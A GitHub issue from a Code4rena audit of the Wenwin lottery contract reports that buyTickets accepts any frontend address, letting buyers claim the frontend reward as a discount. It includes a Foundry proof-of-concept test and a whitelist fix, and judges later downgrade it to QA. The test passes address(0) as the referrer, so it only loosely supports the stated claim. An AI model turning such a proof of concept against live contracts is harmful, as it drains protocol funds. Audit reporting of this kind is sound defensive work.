search

code-423n4 / 2023-03-wenwin-findings

1 stars 1 forks source link

User can always buy tickets at a discount #6

Closed code423n4 closed 1 year ago

code423n4 commented 1 year ago

Lines of code

https://github.com/code-423n4/2023-03-wenwin/blob/main/src/Lottery.sol#L110

Vulnerability details

Impact

There's no validation for the frontend address when calling buyTickets. This means any user can set themselves to be the frontend and get a FRONTEND_REWARD percent discount all the time when buying tickets.

Proof of Concept

// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;

import "./LotteryTestBase.sol";
import "../src/Lottery.sol";
import "./TestToken.sol";
import "test/TestHelpers.sol";

contract MoreLotteryTest is LotteryTestBase {
    address public constant OWNER = address(0x111);

    address public constant USER = address(123);

    function buyTicketOnDiscount(uint128 draw, uint120 ticket, address referrer) internal returns (uint256 ticketId) {
        uint128[] memory drawIds = new uint128[](1);
        drawIds[0] = draw;
        uint120[] memory tickets = new uint120[](1);
        tickets[0] = ticket;

        uint256[] memory ticketIds = lottery.buyTickets(drawIds, tickets, USER, referrer);
        return ticketIds.length > 0 ? ticketIds[0] : 0;
    }

    function testBuyTicket() public {
        uint128 currentDraw = lottery.currentDraw();
        uint256 initialBalance = rewardToken.balanceOf(address(lottery));

        vm.startPrank(USER);
        rewardToken.mint(5 ether);
        rewardToken.approve(address(lottery), 10 ether);
        console.log(rewardToken.balanceOf(address(lottery)));
        buyTicketOnDiscount(currentDraw, uint120(0x0F), address(0));
        lottery.claimRewards(LotteryRewardType.FRONTEND);
        console.log(rewardToken.balanceOf(address(lottery)));
        assertEq(rewardToken.balanceOf(address(lottery)), initialBalance + TICKET_PRICE);
    }

}

Tools Used

forge test

Recommended Mitigation Steps

Establish some kind of whitelist for valid frontends to avoid this problem.

c4-judge commented 1 year ago

thereksfour marked the issue as nullified

c4-judge commented 1 year ago

thereksfour marked the issue as not nullified

c4-judge commented 1 year ago

thereksfour marked the issue as duplicate of #483

c4-judge commented 1 year ago

thereksfour changed the severity to QA (Quality Assurance)